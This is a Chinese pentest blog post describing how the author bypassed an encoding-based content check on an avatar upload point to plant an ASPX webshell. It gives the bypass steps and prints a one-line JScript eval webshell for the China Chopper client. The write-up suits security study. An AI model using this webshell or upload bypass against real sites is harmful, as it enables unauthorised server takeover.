涨见识！如何用骚思路绕过上传后文件内容检测

前言分析：

关于这个上传点我大概研究了三个多小时，上传的时候他会将上传后的文件内容进行Base64加密然后上传，之后我测试上传图片马是可以上传进去的，但是无法解析。

突破上传：

研究请求包时发现：

上传类型修改成aspx类型即可上传aspx文件

经测试是可以上传进去的

但是访问上传路径后发现解析失败，并且shell的代码也找不到了

到这里，其实我脑壳已经有点懵逼了，因为完全第一次碰到这种事情完全不知道是什么原因导致文件解析失败。

只好一点一点测试，经过某大佬提醒，说可以先上传一个jpg后缀的图片马，然后保存上传后的文件排查一下是否在上传过程中对内容进行加密，然后服务端在进行解密。

思路测试：

我们上传后访问图片路径，然后保存下来图片用编辑器打开发现

全乱码了，被加密了，当我有点懵的时候小眼睛一撇，看到了不知道是神马玩意的玩意暴露在我的眼前

是的，就是这个，我就想问谁家图片会出现这种玩意？

所以我们直接在此处随便插入了一句话：

<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>

之后上传我们经过二次插入一句话的图片，将后缀改为aspx即可

菜刀连接成功！

总结：

1.上传点为头像上传，各位可以看看自己的项目头像上传有没有测试哦~

2.若文章没看懂请看此处：

1.当你上传任何文件后，他会对文件的内容进行加密，然后当你访问此文件时服务端在进行解密然后将解密后的显示出来（但是内容还是加密的），若解密后文件出错，那么久无法解析，也会报错，这就是为什么上传的aspx会无法解析无法连接shell。

2.当我们上传一个完整的图片马他会将内容加密，我们把加密后的文件保存下来，然后用编辑器再次插入一句话木马，然后再次上传，那么上传时会判断你上传的文件符合他加密的规则，那么这时就不会进行加密，直接上传进去用菜刀连接shell即可！